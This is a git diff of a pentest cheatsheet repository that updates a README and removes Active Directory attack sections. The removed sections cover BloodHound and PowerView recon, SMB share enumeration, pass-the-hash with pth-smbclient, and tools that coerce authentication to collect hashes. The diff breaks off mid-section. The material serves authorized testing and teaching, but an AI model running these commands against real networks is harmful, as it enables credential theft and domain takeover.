diff --git a/docs/README.md b/docs/README.md
index c9add6a..7440f75 100644
--- a/docs/README.md
+++ b/docs/README.md
@@ -1,4 +1,4 @@
-# đź“• InternalAllTheThings
+# InternalAllTheThings
Active Directory and Internal Pentest Cheatsheets
@@ -11,10 +11,17 @@ Active Directory and Internal Pentest Cheatsheets
đź“– Documentation
-----
-TODO
+* Feel free to update any pages with your knowledge by submitting a Pull Request
+* Content in this repository is provided as is, for learning purpose. The author and contributors take no responsibility if you break something.
👨‍💻 Contributions
-----
-TODO
\ No newline at end of file
+
+
+
+
+
+
+Thanks again for your contribution! :heart:
\ No newline at end of file
diff --git a/docs/active-directory/Active Directory Attack.md b/docs/active-directory/Active Directory Attack.md
index 4336bc3..8524009 100644
--- a/docs/active-directory/Active Directory Attack.md
+++ b/docs/active-directory/Active Directory Attack.md
@@ -6,29 +6,12 @@
- [Summary](#summary)
- [Tools](#tools)
- [Kerberos Clock Synchronization](#kerberos-clock-synchronization)
- - [Active Directory Recon](#active-directory-recon)
- - [Using BloodHound](#using-bloodhound)
- - [Using PowerView](#using-powerview)
- - [Using AD Module](#using-ad-module)
- [From CVE to SYSTEM shell on DC](#from-cve-to-system-shell-on-dc)
- [MS14-068 Checksum Validation](#ms14-068-checksum-validation)
- [ZeroLogon](#zerologon)
- [PrintNightmare](#printnightmare)
- [samAccountName spoofing](#samaccountname-spoofing)
- - [Open Shares](#open-shares)
- - [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
- - [SCF Files](#scf-files)
- - [URL Files](#url-files)
- - [Windows Library Files](#windows-library-files)
- - [Windows Search Connectors Files](#windows-search-connectors-files)
- [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences)
- - [Exploit Group Policy Objects GPO](#exploit-group-policy-objects-gpo)
- - [Find vulnerable GPO](#find-vulnerable-gpo)
- - [Abuse GPO with SharpGPOAbuse](#abuse-gpo-with-sharpgpoabuse)
- - [Abuse GPO with PowerGPOAbuse](#abuse-gpo-with-powergpoabuse)
- - [Abuse GPO with pyGPOAbuse](#abuse-gpo-with-pygpoabuse)
- - [Abuse GPO with PowerView](#abuse-gpo-with-powerview)
- - [Abuse GPO with StandIn](#abuse-gpo-with-standin)
- [Dumping AD Domain Credentials](#dumping-ad-domain-credentials)
- [DCSync Attack](#dcsync-attack)
- [Volume Shadow Copy](#volume-shadow-copy)
@@ -37,27 +20,6 @@
- [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat)
- [NTDS Reversible Encryption](#ntds-reversible-encryption)
- [User Hunting](#user-hunting)
- - [Password spraying](#password-spraying)
- - [Kerberos pre-auth bruteforcing](#kerberos-pre-auth-bruteforcing)
- - [Spray a pre-generated passwords list](#spray-a-pre-generated-passwords-list)
- - [Spray passwords against the RDP service](#spray-passwords-against-the-rdp-service)
- - [BadPwdCount attribute](#badpwdcount-attribute)
- - [Password in AD User comment](#password-in-ad-user-comment)
- - [Password of Pre-Created Computer Account](#password-of-pre-created-computer-account)
- - [Reading LAPS Password](#reading-laps-password)
- - [Reading GMSA Password](#reading-gmsa-password)
- - [Forging Golden GMSA](#forging-golden-gmsa)
- - [Kerberos Tickets](#kerberos-tickets)
- - [Dump Kerberos Tickets](#dump-kerberos-tickets)
- - [Replay Kerberos Tickets](#replay-kerberos-tickets)
- - [Convert Kerberos Tickets](#convert-kerberos-tickets)
- - [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets)
- - [Using Mimikatz](#using-mimikatz)
- - [Using Meterpreter](#using-meterpreter)
- - [Using a ticket on Linux](#using-a-ticket-on-linux)
- - [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets)
- - [Pass-the-Ticket Diamond Tickets](#pass-the-ticket-diamond-tickets)
- - [Pass-the-Ticket Sapphire Tickets](#pass-the-ticket-sapphire-tickets)
- [Kerberoasting](#kerberoasting)
- [KRB_AS_REP Roasting](#krb_as_rep-roasting)
- [Kerberoasting w/o domain account](#kerberoasting-wo-domain-account)
@@ -79,25 +41,8 @@
- [RemotePotato0 DCOM DCE RPC relay](#remotepotato0-dcom-dce-rpc-relay)
- [DNS Poisonning - Relay delegation with mitm6](#dns-poisonning---relay-delegation-with-mitm6)
- [Relaying with WebDav Trick](#relaying-with-webdav-trick)
- - [Active Directory Certificate Services](#active-directory-certificate-services)
- - [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates)
- - [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates)
- - [ESC3 - Misconfigured Enrollment Agent Templates](#esc3---misconfigured-enrollment-agent-templates)
- - [ESC4 - Access Control Vulnerabilities](#esc4---access-control-vulnerabilities)
- - [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2)
- - [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
- - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
- - [ESC9 - No Security Extension](#esc9---no-security-extension)
- - [ESC11 - Relaying NTLM to ICPR](#esc11---relaying-ntlm-to-icpr)
- - [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
- - [Pass-The-Certificate](#pass-the-certificate)
- [UnPAC The Hash](#unpac-the-hash)
- [Shadow Credentials](#shadow-credentials)
- - [Active Directory Groups](#active-directory-groups)
- - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
- - [Abusing DNS Admins Group](#abusing-dns-admins-group)
- - [Abusing Schema Admins Group](#abusing-schema-admins-group)
- - [Abusing Backup Operators Group](#abusing-backup-operators-group)
- [Active Directory Federation Services](#active-directory-federation-services)
- [ADFS - Golden SAML](#adfs---golden-saml)
- [Active Directory Integrated DNS](#active-directory-integrated-dns)
@@ -110,10 +55,6 @@
- [ReadLAPSPassword](#readlapspassword)
- [ReadGMSAPassword](#readgmsapassword)
- [ForceChangePassword](#forcechangepassword)
- - [DCOM Exploitation](#dcom-exploitation)
- - [DCOM via MMC Application Class](#dcom-via-mmc-application-class)
- - [DCOM via Excel](#dcom-via-excel)
- - [DCOM via ShellExecute](#dcom-via-shellexecute)
- [Trust relationship between domains](#trust-relationship-between-domains)
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
- [Forest to Forest Compromise - Trust Ticket](#forest-to-forest-compromise---trust-ticket)
@@ -127,24 +68,9 @@
- [S4U2self - Privilege Escalation](#s4u2self---privilege-escalation)
- [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049)
- [PrivExchange attack](#privexchange-attack)
- - [SCCM Deployment](#sccm-deployment)
- - [SCCM Network Access Accounts](#sccm-network-access-accounts)
- - [SCCM Shares](#sccm-shares)
- - [WSUS Deployment](#wsus-deployment)
- - [RODC - Read Only Domain Controller](#rodc---read-only-domain-controller)
- - [RODC Golden Ticket](#rodc-golden-ticket)
- - [RODC Key List Attack](#rodc-key-list-attack)
- - [RODC Computer Object](#rodc-computer-object)
- [PXE Boot image attack](#pxe-boot-image-attack)
- [DSRM Credentials](#dsrm-credentials)
- [DNS Reconnaissance](#dns-reconnaissance)
- - [Linux Active Directory](#linux-active-directory)
- - [CCACHE ticket reuse from /tmp](#ccache-ticket-reuse-from-tmp)
- - [CCACHE ticket reuse from keyring](#ccache-ticket-reuse-from-keyring)
- - [CCACHE ticket reuse from SSSD KCM](#ccache-ticket-reuse-from-sssd-kcm)
- - [CCACHE ticket reuse from keytab](#ccache-ticket-reuse-from-keytab)
- - [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etckrb5keytab)
- - [Extract accounts from /etc/sssd/sssd.conf](#extract-accounts-from-etcsssdsssdconf)
- [References](#references)
## Tools
@@ -259,286 +185,6 @@ In Kerberos, time is used to ensure that tickets are valid. To achieve this, the
```
-## Active Directory Recon
-
-### Using BloodHound
-
-Use the correct collector
-* AzureHound for Azure Active Directory
-* SharpHound for local Active Directory
-* RustHound for local Active Directory
-
-* use [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md#azure-recon-tools))
-
-* use [BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound)
- ```powershell
- # run the collector on the machine using SharpHound.exe
- # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
- # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe
- .\SharpHound.exe -c all -d active.htb --searchforest
- .\SharpHound.exe -c all,GPOLocalGroup # all collection doesn't include GPOLocalGroup by default
- .\SharpHound.exe --CollectionMethod DCOnly # only collect from the DC, doesn't query the computers (more stealthy)
-
- .\SharpHound.exe -c all --LdapUsername --LdapPassword --JSONFolder
- .\SharpHound.exe -c all --LdapUsername --LdapPassword --domaincontroller 10.10.10.100 -d active.htb
- .\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
-
- # or run the collector on the machine using Powershell
- # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
- # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1
- Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
- Invoke-BloodHound -CollectionMethod All -LDAPUser -LDAPPass -OutputDirectory
-
- # or remotely via BloodHound Python
- # https://github.com/fox-it/BloodHound.py
- pip install bloodhound
- bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
-
- # or locally/remotely from an ADExplorer snapshot from SysInternals (ADExplorer remains a legitimate binary signed by Microsoft, avoiding detection with security solutions)
- # https://github.com/c3c/ADExplorerSnapshot.py
- pip3 install --user .
- ADExplorerSnapshot.py -o <*.json output folder path>
- ```
-* Collect more data for certificates exploitation using Certipy
- ```ps1
- certipy find 'corp.local/john:Passw0rd@dc.corp.local' -bloodhound
- certipy find 'corp.local/john:Passw0rd@dc.corp.local' -old-bloodhound
- certipy find 'corp.local/john:Passw0rd@dc.corp.local' -vulnerable -hide-admins -username user@domain -password Password123
- ```
-* use [OPENCYBER-FR/RustHound](https://github.com/OPENCYBER-FR/RustHound)
- ```ps1
- # Windows with GSSAPI session
- rusthound.exe -d domain.local --ldapfqdn domain
- # Windows/Linux simple bind connection username:password
- rusthound.exe -d domain.local -u user@domain.local -p Password123 -o output -z
- # Linux with username:password and ADCS module for @ly4k BloodHound version
- rusthound -d domain.local -u 'user@domain.local' -p 'Password123' -o /tmp/adcs --adcs -z
- ```
-
-Then import the zip/json files into the Neo4J database and query them.
-
-```powershell
-root@payload$ apt install bloodhound
-
-# start BloodHound and the database
-root@payload$ neo4j console
-# or use docker
-root@payload$ docker run -itd -p 7687:7687 -p 7474:7474 --env NEO4J_AUTH=neo4j/bloodhound -v $(pwd)/neo4j:/data neo4j:4.4-community
-
-root@payload$ ./bloodhound --no-sandbox
-Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
-```
-
-NOTE: Currently BloodHound Community Edition is still a work in progress, it is highly recommended to stay on the original [BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound/) version.
-
-```ps1
-git clone https://github.com/SpecterOps/BloodHound
-cd examples/docker-compose/
-cat docker-compose.yml | docker compose -f - up
-# UI: http://localhost:8080/ui/login
-# Username: admin
-# Password: see your Docker logs
-```
-
-
-You can add some custom queries like :
-* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json)
-* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json)
-* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json)
-* [Certipy BloodHound Custom Queries from ly4k](https://github.com/ly4k/Certipy/blob/main/customqueries.json)
-
-Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`.
-
-
-### Using PowerView
-
-- **Get Current Domain:** `Get-NetDomain`
-- **Enum Other Domains:** `Get-NetDomain -Domain `
-- **Get Domain SID:** `Get-DomainSID`
-- **Get Domain Policy:**
- ```powershell
- Get-DomainPolicy
-
- #Will show us the policy configurations of the Domain about system access or kerberos
- (Get-DomainPolicy)."system access"
- (Get-DomainPolicy)."kerberos policy"
- ```
-- **Get Domain Controlers:**
- ```powershell
- Get-NetDomainController
- Get-NetDomainController -Domain
- ```
-- **Enumerate Domain Users:**
- ```powershell
- Get-NetUser
- Get-NetUser -SamAccountName
- Get-NetUser | select cn
- Get-UserProperty
-
- #Check last password change
- Get-UserProperty -Properties pwdlastset
-
- #Get a specific "string" on a user's attribute
- Find-UserField -SearchField Description -SearchTerm "wtver"
-
- #Enumerate user logged on a machine
- Get-NetLoggedon -ComputerName
-
- #Enumerate Session Information for a machine
- Get-NetSession -ComputerName
-
- #Enumerate domain machines of the current/specified domain where specific users are logged into
- Find-DomainUserLocation -Domain | Select-Object UserName, SessionFromName
- ```
-- **Enum Domain Computers:**
- ```powershell
- Get-NetComputer -FullData
- Get-DomainGroup
-
- #Enumerate Live machines
- Get-NetComputer -Ping
- ```
-- **Enum Groups and Group Members:**
- ```powershell
- Get-NetGroupMember -GroupName "" -Domain
-
- #Enumerate the members of a specified group of the domain
- Get-DomainGroup -Identity | Select-Object -ExpandProperty Member
-
- #Returns all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences
- Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
- ```
-- **Enumerate Shares**
- ```powershell
- #Enumerate Domain Shares
- Find-DomainShare
-
- #Enumerate Domain Shares the current user has access
- Find-DomainShare -CheckShareAccess
- ```
-- **Enum Group Policies:**
- ```powershell
- Get-NetGPO
-
- # Shows active Policy on specified machine
- Get-NetGPO -ComputerName
- Get-NetGPOGroup
-
- #Get users that are part of a Machine's local Admin group
- Find-GPOComputerAdmin -ComputerName
- ```
-- **Enum OUs:**
- ```powershell
- Get-NetOU -FullData
- Get-NetGPO -GPOname
- ```
-- **Enum ACLs:**
- ```powershell
- # Returns the ACLs associated with the specified account
- Get-ObjectAcl -SamAccountName -ResolveGUIDs
- Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose
-
- #Search for interesting ACEs
- Invoke-ACLScanner -ResolveGUIDs
-
- #Check the ACLs associated with a specified path (e.g smb share)
- Get-PathAcl -Path "\\Path\Of\A\Share"
- ```
-- **Enum Domain Trust:**
- ```powershell
- Get-NetDomainTrust
- Get-NetDomainTrust -Domain
- ```
-- **Enum Forest Trust:**
- ```powershell
- Get-NetForestDomain
- Get-NetForestDomain Forest
-
- #Domains of Forest Enumeration
- Get-NetForestDomain
- Get-NetForestDomain Forest
-
- #Map the Trust of the Forest
- Get-NetForestTrust
- Get-NetDomainTrust -Forest
- ```
-- **User Hunting:**
- ```powershell
- #Finds all machines on the current domain where the current user has local admin access
- Find-LocalAdminAccess -Verbose
-
- #Find local admins on all machines of the domain:
- Invoke-EnumerateLocalAdmin -Verbose
-
- #Find computers were a Domain Admin OR a specified user has a session
- Invoke-UserHunter
- Invoke-UserHunter -GroupName "RDPUsers"
- Invoke-UserHunter -Stealth
-
- #Confirming admin access:
- Invoke-UserHunter -CheckAccess
- ```
- :heavy_exclamation_mark: **Priv Esc to Domain Admin with User Hunting:** \
- I have local admin access on a machine -> A Domain Admin has a session on that machine -> I steal his token and impersonate him ->
- Profit!
-
- [PowerView 3.0 Tricks](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993)
-
-### Using AD Module
-
-- **Get Current Domain:** `Get-ADDomain`
-- **Enum Other Domains:** `Get-ADDomain -Identity `
-- **Get Domain SID:** `Get-DomainSID`
-- **Get Domain Controlers:**
-
- ```powershell
- Get-ADDomainController
- Get-ADDomainController -Identity
- ```
-
-- **Enumerate Domain Users:**
- ```powershell
- Get-ADUser -Filter * -Identity -Properties *
-
- #Get a specific "string" on a user's attribute
- Get-ADUser -Filter 'Description -like "*wtver*"' -Properties Description | select Name, Description
- ```
-- **Enum Domain Computers:**
- ```powershell
- Get-ADComputer -Filter * -Properties *
- Get-ADGroup -Filter *
- ```
-- **Enum Domain Trust:**
- ```powershell
- Get-ADTrust -Filter *
- Get-ADTrust -Identity
- ```
-- **Enum Forest Trust:**
- ```powershell
- Get-ADForest
- Get-ADForest -Identity
-
- #Domains of Forest Enumeration
- (Get-ADForest).Domains
- ```
- - **Enum Local AppLocker Effective Policy:**
- ```powershell
- Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
- ```
-
-### Other Interesting Commands
-
-- **Find Domain Controllers**
- ```ps1
- nslookup domain.com
- nslookup -type=srv _ldap._tcp.dc._msdcs..com
- nltest /dclist:domain.com
- Get-ADDomainController -filter * | Select-Object name
- gpresult /r
- $Env:LOGONSERVER
- echo %LOGONSERVER%
- ```
-
## From CVE to SYSTEM shell on DC
@@ -936,170 +582,6 @@ Automated exploitation:
* [KB5008380](https://support.microsoft.com/en-us/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041)
-## Open Shares
-
-> Some shares can be accessible without authentication, explore them to find some juicy files
-
-* [ShawnDEvans/smbmap - a handy SMB enumeration tool](https://github.com/ShawnDEvans/smbmap)
- ```powershell
- smbmap -H 10.10.10.10 # null session
- smbmap -H 10.10.10.10 -R # recursive listing
- smbmap -H 10.10.10.10 -u invaliduser # guest smb session
- smbmap -H 10.10.10.10 -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*"
- ```
-
-* [byt3bl33d3r/pth-smbclient from path-toolkit](https://github.com/byt3bl33d3r/pth-toolkit)
- ```powershell
- pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
- pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$
- ls # list files
- cd # move inside a folder
- get # download files
- put # replace a file
- ```
-
-* [SecureAuthCorp/smbclient from Impacket](https://github.com/SecureAuthCorp/impacket)
- ```powershell
- smbclient -I 10.10.10.100 -L ACTIVE -N -U ""
- Sharename Type Comment
- --------- ---- -------
- ADMIN$ Disk Remote Admin
- C$ Disk Default share
- IPC$ IPC Remote IPC
- NETLOGON Disk Logon server share
- Replication Disk
- SYSVOL Disk Logon server share
- Users Disk
- use Sharename # select a Sharename
- cd Folder # move inside a folder
- ls # list files
- ```
-
-* [smbclient - from Samba, ftp-like client to access SMB/CIFS resources on servers](#)
- ```powershell
- smbclient -U username //10.0.0.1/SYSVOL
- smbclient //10.0.0.1/Share
-
- # Download a folder recursively
- smb: \> mask ""
- smb: \> recurse ON
- smb: \> prompt OFF
- smb: \> lcd '/path/to/go/'
- smb: \> mget *
- ```
-
-
-* [SnaffCon/Snaffler - a tool for pentesters to help find delicious candy](https://github.com/SnaffCon/Snaffler)
- ```ps1
- snaffler.exe -s - snaffler.log
-
- # Snaffle all the computers in the domain
- ./Snaffler.exe -d domain.local -c -s
-
- # Snaffle specific computers
- ./Snaffler.exe -n computer1,computer2 -s
- ​
- # Snaffle a specific directory
- ./Snaffler.exe -i C:\ -s
- ```
-
-
-## SCF and URL file attack against writeable share
-
-Theses attacks can be automated with [Farmer.exe](https://github.com/mdsecactivebreach/Farmer) and [Crop.exe](https://github.com/mdsecactivebreach/Farmer/tree/main/crop)
-
-```ps1
-# Farmer to receive auth
-farmer.exe [seconds] [output]
-farmer.exe 8888 0 c:\windows\temp\test.tmp # undefinitely
-farmer.exe 8888 60 # one minute
-
-# Crop can be used to create various file types that will trigger SMB/WebDAV connections for poisoning file shares during hash collection attacks
-crop.exe